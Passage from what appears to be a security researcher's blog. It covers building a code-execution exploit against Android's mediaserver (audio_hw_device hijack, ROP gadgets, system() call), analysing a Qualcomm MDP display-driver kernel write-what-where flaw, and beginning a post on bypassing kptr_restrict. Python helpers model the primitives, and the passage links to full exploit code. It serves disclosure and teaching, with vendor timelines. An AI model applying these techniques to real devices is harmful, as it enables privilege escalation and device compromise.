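To double-check the boundary, the condition can be modelled with explicit 32-bit wraparound (assuming the addition wraps as it does on ARM; in C, signed overflow is technically undefined behaviour). Under this model the reset branch fires for every value from 0x7FFFFFFF up to 0xFFFFFFFE, while 0xFFFFFFFF is the one exception above that threshold, since -1 + 1 is zero.

```python
def to_int32(value: int) -> int:
    """Reinterpret the low 32 bits of value as a two's-complement int32."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


def takes_reset_branch(ref_count: int, delta: int = 1) -> bool:
    """Models `(int)mRefCount[stream] + delta < 0` on a 32-bit target."""
    return to_int32(delta + to_int32(ref_count)) < 0


for v in (0x7FFFFFFE, 0x7FFFFFFF, 0x80000000, 0xFFFFFFFE, 0xFFFFFFFF):
    print(hex(v), takes_reset_branch(v))
```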

If that were to happen, the actual value would be logged to the system log (an info leak!), and would then be zeroed out before returning from the function. Although this is a nice info-leak, it has two obvious downsides (and another one which I won't cover in this post):

Reading the leaked value requires the READ_LOGS permission (and we originally stated we would like to start with zero permissions)
The value being read is corrupted - this could be troublesome for quite a few exploitation techniques.

But all is definitely not lost; we can still create a much stronger primitive using this vulnerability. Assuming the second if block is not executed, we arrive at the function's end:

So the target value is incremented by one; a limited write primitive. Note that the final log statement is not actually included in a release build (since ALOGV is an empty macro in those builds).

Putting this all together, we get a write primitive allowing us to increment the value at mRefCount[stream] by one, so long as it is not larger than or equal to 0x7FFFFFFF.
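Because each call can only add one, the cost of reaching a given value is simply the distance to it. A small hypothetical helper, under the same 32-bit model and ignoring the wrap at 0xFFFFFFFF, makes the constraint explicit:

```python
from typing import Optional

RESET_THRESHOLD = 0x7FFFFFFF  # at or above this, the next increment zeroes the DWORD


def increments_needed(current: int, target: int) -> Optional[int]:
    """Number of +1 calls taking a DWORD from current to target, or None.

    Every intermediate value must stay below RESET_THRESHOLD, so the target
    may be at most RESET_THRESHOLD itself, and we can only count upwards.
    """
    if not current <= target <= RESET_THRESHOLD:
        return None
    return target - current


print(increments_needed(0x100, 0x104), increments_needed(0x104, 0x100))  # prints 4 None
```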

I spy with my little eye

Now that we have a write primitive, let's look for a read primitive. Also, since our write primitive is relative to an AudioOutputDescriptor object, which is dynamically allocated (and is therefore located in a rather unpredictable location in the heap), it would be much more convenient if we were able to find such a primitive which is also relative to an AudioOutputDescriptor object.

Poring over AudioPolicyManagerBase's methods once more reveals a very tempting target: the AudioPolicyManagerBase::isStreamActive method. This method allows a user to query a given stream in order to check if it was active in any of the output descriptors within the user-supplied time-frame:

So once again - this method performs no validation at all on the given "stream" argument. Perhaps the validation is delegated to the internal AudioOutputDescriptor::isStreamActive method?

Nope - lucky once again!

So, once more we access the mRefCount member of the AudioOutputDescriptor using the "stream" argument as an index (while performing no validation whatsoever). As we can see, there are two cases in which this function would return true:

If mRefCount[stream] != 0
Otherwise, if the time difference between the current system time and the value of mStopTime[stream] is less than the user-supplied argument - inPastMs.

Since we would like to use this vulnerability as an easy read primitive, we would first seek to eliminate side-effects. This is crucial as it would make the actual exploit much easier to build (and much more modular).

Fortunately, simply passing in the argument "inPastMs" with the value 0x80000000 (i.e., INT_MIN) would cause the last if statement to always evaluate to false (since there are no integers smaller than INT_MIN).

This leaves us with a simple and "clean" (albeit somewhat weak) read primitive: the function isStreamActive will return true iff the value at mRefCount[stream] is not zero. Since the stream argument is fully controlled by us, we can use it to "scan" the memory relative to the AudioOutputDescriptor object, and to gauge whether or not it contains a zero DWORD.
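As a sketch, the primitive boils down to a zero/non-zero oracle that we can sweep over indices. Here memory is modelled as a dictionary of DWORDs indexed relative to mRefCount (so negative indices work too), and the function names are hypothetical:

```python
from typing import Callable, Dict, List


def is_stream_active_model(memory: Dict[int, int], stream: int) -> bool:
    # With inPastMs = INT_MIN only the first check matters, so the call
    # returns True iff the DWORD at mRefCount[stream] is non-zero.
    return memory.get(stream, 0) != 0


def scan(oracle: Callable[[int], bool], first: int, count: int) -> List[bool]:
    """Probe `count` consecutive DWORD indices, starting at `first`."""
    return [oracle(index) for index in range(first, first + count)]


memory = {-2: 0x1234, -1: 0, 0: 0, 1: 0xDEADBEEF}
print(scan(lambda i: is_stream_active_model(memory, i), -2, 4))
# prints [True, False, False, True]
```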

Thermal Vision

At this point you might be wondering - how can you even call this a read-primitive? After all, the only possible information we can learn using this vulnerability is whether or not the value at a given address is zero. Glad you (kind-of) asked!

In fact, this is more than enough for us to find our way around the heap. Instead of thinking in terms of "heap" and "memory", let's use our imagination.

You're a secret agent out on a mission. You're standing behind a closed door, leading to the room you need to enter. So what do you naturally do? Turn on your thermal vision goggles, of course. The goggles present you with the following image:

So it's safe - we can see it's only a dog.

Let's look at the image again - did we really need all the heat information? For example, what if we only had information if a given pixel is "hot" or not?

Still definitely recognizable.

This is because the outline of the dog allowed us to create a "heat signature", which we could then use to identify dogs using our thermal goggles.

So what about heaps and memory? Let's say that when a value in memory is non-zero, it is "hot", and otherwise, that memory location is "cold". Now - using our read-primitive, we can create a form of thermal vision goggles, just like the pair we imagined a minute ago.
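Our "goggles" are then just a rendering of the oracle's answers. A sketch, assuming we've already collected a sequence of DWORDs (or of hot/cold booleans) from a scan; heat_map is a hypothetical helper name:

```python
from typing import Sequence


def heat_map(dwords: Sequence[int], width: int = 16) -> str:
    """Render memory as rows of '#' (non-zero, "hot") and '.' (zero, "cold")."""
    cells = "".join("#" if dword else "." for dword in dwords)
    return "\n".join(cells[i:i + width] for i in range(0, len(cells), width))


print(heat_map([0x41, 0, 0, 7, 0, 0, 0, 0x8000], width=4))
```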

All that remains to be seen is whether or not we can create good "heat signatures" for objects we are interested in.

First, a histogram of a full memory dump of the heap in the mediaserver process reveals that the value zero is by far the most common:

Moreover, typical heap objects appear to have many zeros within them, leading to some interesting repeatable patterns. Here is a heat-map generated from the aforementioned heap dump:

Now - looking at the binary heat-map we can see there are still many interesting patterns we can use to try and "understand" which objects we are observing:

So now that you're (hopefully) convinced, we can move on to building an actual exploit!

Building an exploit

As we've established above, we now have two tools in our belt:

We can increment any value, so long as it's lower than 0x7FFFFFFF
We can inspect a memory location in order to check if it contains the value zero or not

In order to take this one step further, it would be nice if we were able to find an object that has a very "distinct" heat-signature, and which also contains pointers to functions which we can call (using regular API calls), and to which we can pass controllable arguments.

Searching around for a bit reveals a prime candidate for exploitation - audio_hw_device. This is a structure holding many function pointers for the implementations of each of the functions provided by an actual audio hardware device (it is part of the audio hardware abstraction layer). Moreover, these function pointers can also be triggered with ease simply by calling different parts of the audio policy service and audio flinger APIs.

However, what makes this object especially interesting is its structure - it begins with a fixed-length header initialized with non-zero values. Then, it contains a large block of "reserved" values, which are initialized to zero, followed by a large block of function pointers, of which only the second one is initialized to zero.

This means audio_hw_device objects have quite a unique heat signature:
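Searching for such a signature is a simple pattern match over a string with one character per DWORD ('#' for non-zero, '.' for zero). In the sketch below the field counts are placeholders: HEADER_DWORDS and RESERVED_DWORDS are assumptions based on my reading of the generic hw_device_t header (tag, version and module, followed by twelve reserved words), and FUNC_DWORDS is an arbitrary number; all three should be checked against the audio HAL headers of the targeted build.

```python
import re
from typing import List

HEADER_DWORDS = 3     # assumption: non-zero header words
RESERVED_DWORDS = 12  # assumption: zero-initialised "reserved" block
FUNC_DWORDS = 20      # hypothetical number of function pointers

# Hot header, cold reserved block, then function pointers where only the
# second one is NULL.
SIGNATURE = ("#" * HEADER_DWORDS + "." * RESERVED_DWORDS
             + "#" + "." + "#" * (FUNC_DWORDS - 2))


def find_signature(hot_cold: str, signature: str = SIGNATURE) -> List[int]:
    """Return every DWORD offset at which the heat signature matches."""
    # A lookahead lets overlapping candidates be reported as well.
    pattern = re.compile("(?=" + re.escape(signature) + ")")
    return [match.start() for match in pattern.finditer(hot_cold)]


dump = "." * 5 + SIGNATURE + "..."
print(find_signature(dump))  # prints [5]
```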

So we can easily find these objects, great! Now what?

Let's sketch a game-plan:

Search for an audio_hw_device using its heat signature
Create a "stronger" read primitive (using the existing primitives)
Create a "stronger" write primitive (again, using the existing primitives)
Using the new primitives, hijack a function to execute arbitrary code

We've already seen how we can search for an audio_hw_device by using the heat signature mentioned above, but what about creating new primitives?

Harder Better Faster Stronger (primitives)

In order to do so, we would like to hijack a function within the audio_hw_device structure with the following properties:

We can easily trigger a call to this function by invoking external API calls
The function's return value is returned to the user
The arguments to this function are completely user-controlled

Reading through the different API calls once more, we arrive at the perfect candidate; AudioFlinger::getInputBufferSize:

As you can see, an audio_config structure is populated using the user-provided values, and is then passed on to the audio hardware device's implementation - get_input_buffer_size.

This means that if we find our audio_hw_device, we can modify the get_input_buffer_size function pointer to point to any gadget we would like to execute - and whichever value we return from that gadget, will be simply returned to the user.

Creating the primitives

First of all, we would like to find out the real memory address of the audio_hw_device structure. This is useful in case we would like to pass a pointer to a location within this object at a later stage of the exploit.

This is quite easily accomplished by using our weak write primitive in order to increment the value of the get_input_buffer_size function pointer so that it will point to a "BX LR" gadget - i.e., instead of performing any operation, the function will simply return.

Since the first argument provided to the function is a pointer to the audio_hw_device structure itself, it will be stored in register R0 (according to the ARM calling convention), so upon executing our crafted return statement, the value returned will be the value of R0, namely, the pointer to the audio_hw_device.

Now that we have the address of the audio_hw_device, we would like to also read an address within one of the loaded libraries. This is necessary so that we'll be able to calculate the absolute location of other loaded libraries and gadgets within them.

Conveniently, as we've seen before, the audio_hw_device structure contains many function pointers - all of which point to the text segment of one of the loaded libraries. This means that reading any of these function pointers is sufficient for us to learn the location of the loaded libraries.

Moreover, since the get_input_buffer_size function receives the audio_hw_device as its first argument, we can search for any gadget which reads into R0 a value from R0 at an offset which falls within the function pointer block range, and returns. There are many such gadgets, so we can simply choose one:
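Turning the leaked pointers into usable addresses is simple arithmetic. The offsets below are hypothetical (in practice they come from the exact library build being targeted), and the helper sets the low bit for Thumb gadgets, since on ARM a branch-and-exchange to an odd address switches to Thumb state.

```python
def library_base(leaked_pointer: int, symbol_offset: int) -> int:
    """Load address of a library, given a leaked pointer to a known symbol."""
    return leaked_pointer - symbol_offset


def gadget_address(base: int, gadget_offset: int, thumb: bool = False) -> int:
    """Absolute gadget address; Thumb code is entered via an odd address."""
    return base + gadget_offset + (1 if thumb else 0)


# Hypothetical numbers: a leaked function pointer and its offset in the library.
base = library_base(0x40123457, 0x3457)
print(hex(base), hex(gadget_address(base, 0x1A2C, thumb=True)))
# prints 0x40120000 0x40121a2d
```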

At this point, we know the location of the audio_hw_device and of the loaded libraries. All that's left is to create an arbitrary write primitive.

As we've seen before, three user-controlled values are inserted into a structure and passed as the second argument (R1) to get_input_buffer_size. We can now use this to our advantage; we'll pass in values corresponding to our wanted write address and value as the first two arguments to the function. These will get packed into the first two values in the audio_config structure.

Now, we'll search for a unique gadget which unpacks these two values from R1, writes our crafted value into the wanted location and returns.

While this seems like a lot to ask for, after searching through a multitude of gadgets, there appears to be a gadget (in libcamera_client.so) which does just this:

This means we can now increment the get_input_buffer_size function pointer to point to this gadget, and by passing the wanted values to the AudioFlinger::getInputBufferSize function, we can now write any 32-bit value to any absolute address within the mediaserver process's virtual address space.
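The write primitive can be modelled as packing our two values into the start of audio_config and letting the gadget unpack them. Both the field layout (three consecutive 32-bit little-endian fields at the start of the structure) and the gadget semantics (first field used as the address, second as the value) are assumptions for illustration; the actual gadget's register usage determines which is which. All helper names are hypothetical.

```python
import struct
from typing import Dict


def pack_audio_config(first: int, second: int, third: int) -> bytes:
    # Assumed layout of the start of audio_config: three uint32 fields.
    return struct.pack("<III", first, second, third)


def write_gadget(memory: Dict[int, int], config: bytes) -> int:
    """Hypothetical gadget: unpack (address, value) via R1 and store the value."""
    address, value = struct.unpack_from("<II", config, 0)
    memory[address] = value
    return value


def write32(memory: Dict[int, int], address: int, value: int) -> None:
    # Each call stands in for one AudioFlinger::getInputBufferSize request
    # made while get_input_buffer_size points at the gadget.
    write_gadget(memory, pack_audio_config(address, value, 0))


mem: Dict[int, int] = {}
write32(mem, 0xB0001000, 0x41414141)
print({hex(k): hex(v) for k, v in mem.items()})  # prints {'0xb0001000': '0x41414141'}
```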

We have lift-off

Now that we have all the primitives we need, we just need to put the pieces together. We'll create an exploit which calls the "system" function within the "mediaserver" process.

Once we have the addresses of the audio_hw_device and the library addresses, along with an arbitrary write primitive, we can prepare the arguments to our "system" function call anywhere within mediaserver's virtual address space.

A good scratch pad candidate would be the "reserved" block within the audio_hw_device, since we already know its absolute memory location (because we leaked the address of the audio_hw_device), and we also know that overwriting that area won't have any negative side-effects. Using our write primitive, we can now write the path we would like to call "system" on to the "reserved" block, along with the address of the "system" function itself (which we can calculate since we leaked the library load address).
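Preparing the scratch pad then amounts to a list of 32-bit writes. In this sketch the layout (the function pointer in the first slot, the NUL-terminated command right after it) is hypothetical, as is the 48-byte capacity, which assumes twelve reserved DWORDs; strings are packed little-endian, matching ARM Android.

```python
from typing import List, Tuple


def string_to_dwords(text: str) -> List[int]:
    """NUL-terminate and pad text to a multiple of 4 bytes, as little-endian DWORDs."""
    data = text.encode() + b"\0"
    data += b"\0" * (-len(data) % 4)
    return [int.from_bytes(data[i:i + 4], "little") for i in range(0, len(data), 4)]


def scratch_pad_writes(base: int, system_addr: int, command: str,
                       capacity: int = 48) -> List[Tuple[int, int]]:
    """(address, value) pairs to issue with the arbitrary write primitive."""
    words = [system_addr] + string_to_dwords(command)
    if 4 * len(words) > capacity:
        raise ValueError("command does not fit in the reserved block")
    return [(base + 4 * i, word) for i, word in enumerate(words)]


print([(hex(a), hex(v)) for a, v in scratch_pad_writes(0x1000, 0x40001234, "id")])
# prints [('0x1000', '0x40001234'), ('0x1004', '0x6469')]
```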

Now, we can use our write primitive to change the get_input_buffer_size function pointer one final time - this time we would like to point it at a gadget which would unpack the function address and argument we have written into the reserved block, and would execute the function using this argument. This gadget was found in libstagefright.so:

So... This is it; we now have code execution within the "mediaserver" process. Here's a small diagram recapping our total exploit flow:

Full Exploit Code

As always, I'd like to provide the full exploit code covered in this blog post. You can get it here:

https://github.com/laginimaineb/cve-2014-7920-7921

The gadgets were collected for Android version 4.3, but can obviously be adjusted to whichever Android version you would like to run the exploit against (up to Android 5.1).

I highly recommend that you download and look at the exploit's source code - there are many nuances I did not cover in the blog post (for brevity's sake), and each stage of the exploit is heavily documented.

Have fun!

Timeline

14.10.14 - Vulnerabilities disclosed to Google
21.10.14 - Notified the Android security team that I've written a full exploit
13.12.14 - Sent query to Google regarding the current fix status
03.01.15 - Got response stating that the patches will be rolled out in the upcoming version
03.02.15 - Sent another query to Google
18.02.15 - Got response stating the fix status has not changed
08.03.15 - Sent third query to Google
19.03.15 - Got response saying patches have been pushed into Android 5.1

Android linux kernel privilege escalation (CVE-2014-4323)

2015-08-26T02:06:00.000+03:00

In this blog post, we'll cover another Android linux kernel privilege escalation vulnerability I discovered, which could be used to achieve kernel code execution on Android devices.

This time we'll only go over the vulnerability, with no exploit, since I don't personally have any device which is vulnerable to this issue, and therefore couldn't write an exploit. However, we'll dream up an exploit together, which should be pretty simple to implement.

Before we start, I'd like to point out that this vulnerability has been responsibly disclosed to Qualcomm, and it has since been fixed (see "Timeline" below). It should be noted that this vulnerability was present in all Qualcomm devices using the following chipsets:

APQ 8064 (Snapdragon S4 Pro)
MSM 8960 (Snapdragon S4)
MSM 8660 (Snapdragon S3)
MSM 8x30
MSM 7x30

So all devices based on these SoCs (such as the Nexus 4, Nexus 7, etc.), with kernels dated before December 2014, should be vulnerable (see "Timeline" below).

Let's get to it

Today we'll take a look at the "mdp" display driver. There are slight variations of this driver, depending on the SoC. However, both the MDP22 and MDP303 versions (which correspond to the SoCs listed above) are vulnerable.

Normally, users may access the display driver in order to modify the display's properties, and perhaps even in order to retrieve the current frame-buffer (that is, take a screenshot).

Since these operations are somewhat sensitive, they are usually restricted so that only processes with the "graphics" group-ID may perform them. This is facilitated by setting the permissions on the device files appropriately:

Naturally, the process in charge of compositing surfaces on Android (surfaceflinger) is a member of this group. However! The shell user is also a member of the graphics group - meaning, it can interact freely with the "mdp" driver (and therefore the vulnerability is also locally exploitable).

shell's user-ID and group-IDs

Diving into the code

The "mdp" driver is extremely complex, supporting a wide range of commands; from IOCTLs, to memory mapping the device, etc.

This means we need a good strategy for mapping out the weak spots within the driver. Skimming over the code, and going by the sheer number of supported IOCTL commands (at least twenty), looking at the IOCTL commands in depth seems like it might be a lucrative venture.

Funnily, though, there was no need to go too deeply, since the second IOCTL command turned out to be vulnerable :)

MSMFB_SET_LUT

The "mdp" driver allows a user to change the colour map lookup table used by the display, by means of a special IOCTL called "MSMFB_SET_LUT". The actual implementation of this IOCTL is deferred to a simple call to an internal function pointer, which is initialized to point to the actual implementation based on the MDP platform which is compiled into the kernel.

The above "lut_update" function pointer is initialized to point to the "mdp_lut_update_lcdc" on the MDP22 system, and to "mdp_lut_update_nonlcdc" on the MDP303. Keep in mind that both of these functions receive the "fb_cmap" structure which is copied from the user directly, without any validations (as evidenced above).

Both of these functions call the "mdp_lut_hw_update" function directly in order to update the lookup-table, without performing any validations of their own on the user-controlled "fb_cmap" structure.

Let's take a good look at the "fb_cmap" structure:

Alarm bells should be ringing right about now:

This structure contains a large (32-bit) length field
There's a "start" field which is not only large (32-bit), but whose name indicates that it might actually be treated as a pointer, even though its type is an unsigned integer
None of the pointers in the structure are marked as "tainted" (using "__user")!
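For reference, the structure can be mirrored with Python's ctypes from the standard user-space definition of struct fb_cmap in <linux/fb.h>. This is a sketch for experimenting with the layout, not code from any exploit; the helper make_single_entry_cmap is hypothetical. Note that ctypes lays the structure out for the interpreter's own pointer size, so it only matches the kernel's ABI when both are 32-bit (or both are 64-bit).

```python
import ctypes

U16_PTR = ctypes.POINTER(ctypes.c_uint16)


class FbCmap(ctypes.Structure):
    """Mirror of struct fb_cmap from <linux/fb.h>."""
    _fields_ = [
        ("start", ctypes.c_uint32),  # first entry to update; never validated by mdp
        ("len", ctypes.c_uint32),    # number of entries to update
        ("red", U16_PTR),            # user-space arrays of 16-bit colour values
        ("green", U16_PTR),
        ("blue", U16_PTR),
        ("transp", U16_PTR),         # transparency array, may be NULL
    ]


def make_single_entry_cmap(start, r, g, b):
    """Hypothetical helper: build a colour map with a single entry.

    Returns (cmap, arrays); keep `arrays` alive while `cmap` is in use,
    since the structure only stores raw pointers into them.
    """
    red = (ctypes.c_uint16 * 1)(r)
    green = (ctypes.c_uint16 * 1)(g)
    blue = (ctypes.c_uint16 * 1)(b)
    cmap = FbCmap(start=start, len=1,
                  red=ctypes.cast(red, U16_PTR),
                  green=ctypes.cast(green, U16_PTR),
                  blue=ctypes.cast(blue, U16_PTR),
                  transp=None)
    return cmap, (red, green, blue)
```

With len set to 1, the driver performs a single iteration, which is exactly the case the analysis below relies on.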

Finally - let's keep our fingers crossed and take a look at the "mdp_lut_hw_update" function:

First, the function iterates "len" times. Then, for each iteration, the function reads the red, green and blue values from the "fb_cmap" (safely, using "copy_from_user"). But here comes the scary part:

At first glance - this might just be some innocuous piece of code. After all, who knows what MDP_OUTP means... But we've come this far, let's at least find out what it means:

Still none the wiser. What does "outpdw" do?

Oh.

For those who haven't come across it before, "writel" simply writes the value in "val" to the address at "port", issuing a memory write barrier beforehand. It is typically used to write to memory-mapped registers, where the barrier makes sure the write is correctly ordered with respect to preceding memory accesses.

Regardless, this means that the function above writes the concatenated value of the red, green and blue parameters (which are fully user controlled), into an address which is built from fully known, constant values and a fully controlled 32-bit value which is not validated in any way, since:

"MDP_BASE" is a macro which is defined to a constant memory mapped address (one for each SoC)
0x93800 is a constant number and therefore also known in advance
"mdp_lut_i" is actually a flag which is set alternately to either 0 or 1, on each call to MSMFB_SET_LUT. This means that the value of 0x400*mdp_lut_i is either 0 or 0x400
Since we can set cmap->len to 1, the index "i" will therefore be zero in the single iteration performed, meaning we can ignore i*4 (since it will equal zero)
cmap->start is fully user-controlled and never validated

Here's what it looks like:

Putting it together - this means that we can write any 24-bit value into any memory address - great! :)
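To make the arithmetic concrete, here is a minimal Python sketch of the primitive. It assumes that the destination expression in mdp_lut_hw_update is MDP_BASE + 0x93800 + 0x400*mdp_lut_i + cmap->start*4 + i*4 (wrapping at 32 bits) and that the colour components are packed as g | b << 8 | r << 16. Both details are assumptions to verify against the kernel you target. Under the start*4 assumption, only 4-byte aligned targets are reachable, which is still plenty for overwriting pointers. The function names are hypothetical, and the MDP_BASE used in any example is a made-up value.

```python
MASK32 = 0xFFFFFFFF
LUT_OFFSET = 0x93800  # constant offset used on the MDP22/MDP303 path


def lut_write_target(mdp_base, lut_i, start, i=0):
    """Destination of one loop iteration (assumed expression, 32-bit wrap)."""
    return (mdp_base + LUT_OFFSET + 0x400 * lut_i + start * 4 + i * 4) & MASK32


def lut_write_value(r, g, b):
    """24-bit value written for one entry (assumed g | b << 8 | r << 16 packing)."""
    return (g & 0xFF) | ((b & 0xFF) << 8) | ((r & 0xFF) << 16)


def start_for_target(mdp_base, lut_i, target):
    """Choose cmap->start so that a single-entry write (i == 0) lands on target."""
    delta = (target - mdp_base - LUT_OFFSET - 0x400 * lut_i) & MASK32
    if delta % 4:
        raise ValueError("target unreachable: offset is not a multiple of 4")
    return delta >> 2  # start * 4 == delta (mod 2**32)


def rgb_for_value(value):
    """Split a 24-bit value into the (r, g, b) entries that produce it."""
    if value >> 24:
        raise ValueError("only 24-bit values can be written")
    return (value >> 16) & 0xFF, value & 0xFF, (value >> 8) & 0xFF
```

For example, start_for_target(base, lut_i, addr) together with rgb_for_value(value) gives the cmap->start and the single red/green/blue entry to pass to MSMFB_SET_LUT, provided mdp_lut_i is known.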

Dreaming up an exploit

First, as with all exploits, we'd like to neatly package the write-what-where primitive into a single function. Let's imagine we've done that, and that it's called write_value, and it accepts a 24-bit value and a 32-bit address to which this value should be written.

In order to make exploitation fully reliable, we'd need to know the current value of "mdp_lut_i". This can be done by mapping a sterile buffer in user-space which is more than 0x400 bytes large. Then, we can simply trigger the overwrite vulnerability with a cmap->start value chosen so that the destination address corresponds either to the beginning of this mapped buffer or to its end:

After triggering the overwrite, we can check the sterile buffer to see where the overwrite occurred - allowing us to deduce the value of "mdp_lut_i".
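The probing step can be simulated without a device. In the sketch below, SimulatedMdp is a hypothetical stand-in for the driver (a dict plays the role of memory). It models the destination as MDP_BASE + 0x93800 + 0x400*mdp_lut_i + cmap->start*4, which is an assumption about the exact expression, and it assumes that the flag flips exactly once per MSMFB_SET_LUT call. The probe aims at the start of the sterile buffer as if mdp_lut_i were 0, then checks which of the two candidate offsets received the marker.

```python
MASK32 = 0xFFFFFFFF
LUT_OFFSET = 0x93800


class SimulatedMdp:
    """Hypothetical driver stand-in: writes one value per call, then toggles mdp_lut_i."""

    def __init__(self, mdp_base, lut_i, memory):
        self.mdp_base = mdp_base
        self.lut_i = lut_i
        self.memory = memory  # dict: address -> written value

    def set_lut(self, start, value):
        addr = (self.mdp_base + LUT_OFFSET + 0x400 * self.lut_i + start * 4) & MASK32
        self.memory[addr] = value
        self.lut_i ^= 1  # assumed: the flag flips once per call


def probe_lut_i(driver, mdp_base, buf_addr, buf_len, marker=0x5A5A5A):
    """Return the mdp_lut_i value that the *next* call will use."""
    if buf_len < 0x400 + 4:
        raise ValueError("buffer must cover both possible landing spots")
    # Aim at the buffer's start, assuming lut_i == 0 for this call.
    start = ((buf_addr - mdp_base - LUT_OFFSET) & MASK32) >> 2
    driver.set_lut(start, marker)
    if driver.memory.get(buf_addr) == marker:
        used = 0
    elif driver.memory.get(buf_addr + 0x400) == marker:
        used = 1
    else:
        raise RuntimeError("marker not found in the sterile buffer")
    return used ^ 1  # the flag has toggled since the probe
```

Returning the value for the next call (rather than the one just observed) means every subsequent write can be aimed without guessing.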

Now that we know all the values from which the destination address is built, we can freely overwrite any address within the kernel's virtual address space. From here on, we can simply overwrite a kernel function pointer and redirect it to a function stub allocated within user-space.

This is actually identical to the exploitation method covered in a previous blog post - in which we overwrote a function pointer within "pppolac_proto_ops" and triggered it by closing a PPP_OLAC socket.

And there you have it. A fully imaginary exploit, just waiting to be written :) If you do happen to write this exploit, please let me know!

Timeline

27.09.14 - Vulnerability disclosed
29.09.14 - Initial response from QC
02.10.14 - Issue confirmed by QC
13.11.14 - QC publishes notification to customers
27.11.14 - QC publishes notification to carriers
11.12.14 - Issue closed, CAF advisory issued

Effectively bypassing kptr_restrict on Android

2015-08-25T17:59:00.001+03:00

In this blog post, we'll take a look at a few ways that I've discovered in order to bypass kptr_restrict on Android, allowing for easier exploitation of vulnerabilities that require some information on the virtual addresses in which the kernel is loaded. But first, for those of you who aren't familiar with the "protection" offered by kptr_restrict, let's get you up to speed on the subject.

What's kptr_restrict?

As we've seen in the previous blog post, sometimes exploits require knowledge of internal kernel pointers - either in order to hijack them, or in order to corrupt them in a controllable manner.

This fact has been known for quite some time - enough time, in fact, for it to be addressed directly. The Linux kernel contains a feature which enables it to filter out such addresses in order to avoid leaking them to a potential attacker. This configurable feature is called "kptr_restrict", and has been present in the Android kernel source tree for at least two years.

As with nearly all configurable kernel parameters, there is a special file which controls how this feature behaves when filtering kernel addresses. In the case of kptr_restrict, the file resides at "/proc/sys/kernel/kptr_restrict", and has some daunting permissions set:

Essentially, only root can modify its value, but any user can read it.

So how does kptr_restrict work? Well, first of all, kernel developers needed a way to mark kernel pointers as such, whenever those are outputted. This is achieved by using a new format specifier, "%pK", which is used to denote that the value written into that specifier contains a kernel pointer, and as such, should be protected.

There are three different values which control the protection offered by kptr_restrict:

0 - The feature is completely disabled
1 - Kernel pointers which are printed using "%pK" are hidden (replaced with zeroes), unless the user has the CAP_SYSLOG capability, and has not changed their UID/GID (to prevent leaking pointers from files opened before dropping permissions).
2 - All kernel pointers printed using "%pK" are hidden
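The three settings can be summarised as a small decision function. This is a simplified Python model of the behaviour described above, not the kernel's code (the real check is part of the %pK handling in lib/vsprintf.c). The parameter ids_unchanged is a hypothetical stand-in for the kernel's comparison of real and effective IDs, and pointers are rendered as 32-bit hex for brevity.

```python
def kptr_visible(kptr_restrict, has_cap_syslog, ids_unchanged):
    """Return True if a %pK pointer would be printed unmodified.

    0 - no filtering at all
    1 - shown only to CAP_SYSLOG holders whose IDs have not changed
    2 - always hidden
    """
    if kptr_restrict == 0:
        return True
    if kptr_restrict == 1:
        return has_cap_syslog and ids_unchanged
    return False


def format_pk(pointer, kptr_restrict, has_cap_syslog=False, ids_unchanged=True):
    """Render a 32-bit pointer the way %pK would, zeroing it when hidden."""
    visible = kptr_visible(kptr_restrict, has_cap_syslog, ids_unchanged)
    return f"{pointer if visible else 0:08x}"
```

For example, format_pk(0xc0008000, 2, has_cap_syslog=True) still yields "00000000", which is the setting found on the devices discussed here.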

The default value of this configuration is chosen when building the kernel (via CONFIG_SECURITY_KPTR_RESTRICT), but for all modern Android devices that I've ever encountered, this value is always set to "2".

However - how many kernel developers actually know of the need to protect kernel pointers by using "%pK"? This can easily be answered by grepping the kernel for this format string. The answer is, as expected, quite sad:

Merely 35 times (in 23 files) within the entire kernel source code. Needless to say, kernel pointers are very often printed using the "normal" pointer format specifier, "%p" - a simple search shows many hundreds of such uses.
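A rough way to reproduce this kind of count is to walk a kernel tree and tally the format strings. The sketch below shows one way to do it, not the command used for the numbers above. It counts occurrences rather than matching lines, only looks at .c and .h files, and treats any "%p" not followed by a letter as a bare pointer format (so extensions such as "%pS" or "%pI4" are excluded). Expect its totals to differ somewhat from a plain grep.

```python
import os
import re

PK_RE = re.compile(r"%pK")                # protected kernel-pointer format
BARE_P_RE = re.compile(r"%p(?![A-Za-z])")  # plain %p, no extension letter


def count_pointer_formats(root):
    """Return (%pK uses, files containing %pK, bare %p uses) under root."""
    pk = bare = 0
    pk_files = set()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith((".c", ".h")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                text = f.read()
            hits = len(PK_RE.findall(text))
            if hits:
                pk += hits
                pk_files.add(path)
            bare += len(BARE_P_RE.findall(text))
    return pk, len(pk_files), bare
```

Calling count_pointer_formats("path/to/kernel") on a source checkout returns the three totals as a tuple.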

So now that we've set the stage, let's see why the protection offered by kptr_restrict is insufficient on its own.

Method #1 - Getting dmesg from shell

All log messages printed by the kernel are written to a circular buffer held within the kernel's memory. Users may read from this buffer by invoking the "dmesg" (display message) command. This command actually accesses the buffer by invoking the syslog system call, as you can see from this strace output:

However, the syslog system call can't be accessed by just any user - specifically, the caller must either possess the extremely powerful CAP_SYS_ADMIN capability, or the weaker (and more specific) capability of CAP_SYSLOG.

Either way, most Android processes do not, in fact, have these capabilities, and therefore can't access the kernel log. Or can they? :)

Recall that within Android, the "init" process maintains a list of "services" which can be started or stopped as needed. These services are loaded by "init" upon boot, from a hard-coded list of configuration files, which are almost always stored on the root (read-only) partition, and are therefore read-only.

The configuration files are actually written using a language specific to Android, called the "Android Init Language". This language is pretty simple and easy to use, and allows full control over the permissions with which services are launched (UID/GID) as well as their parameters and "type" (for more information about the language itself, check out the link above).

Another feature of Android is "system properties" - these are key-value pairs which are maintained by the "property service", which is also a thread within the init process. This service allows basic access-control on various "sensitive" system properties, which prevents users from freely modifying any property they please.

These access-permissions for most properties used to be (until Android 4.4) hard-coded within the property service (since Android 5, the permissions are handled by using SELinux labels instead):

However, some properties get special treatment, namely - the "ctl.start" and "ctl.stop" system properties, which are used to either start or stop system services (defined, as mentioned before, using the "Android Init Language").

These properties are checked strictly using SELinux labels, in order to make sure that the privilege of modifying the status of system services is reserved strictly to certain users.

But here comes the surprising part - when connecting locally to the device using "adb" (Android Debug Bridge), we gain execution as the "shell" user. This user is always permitted to start and stop one particular service - "dumpstate". Actually, this is used by a feature offered by the "adb" command-line utility, which enables developers to create bug reports containing full information from the device.

Running "adb bugreport" (or simply executing "bugreport" from the adb shell) actually starts the "dumpstate" service by setting the "ctl.start" system property:

So let's take a look at the configuration for the "dumpstate" service:

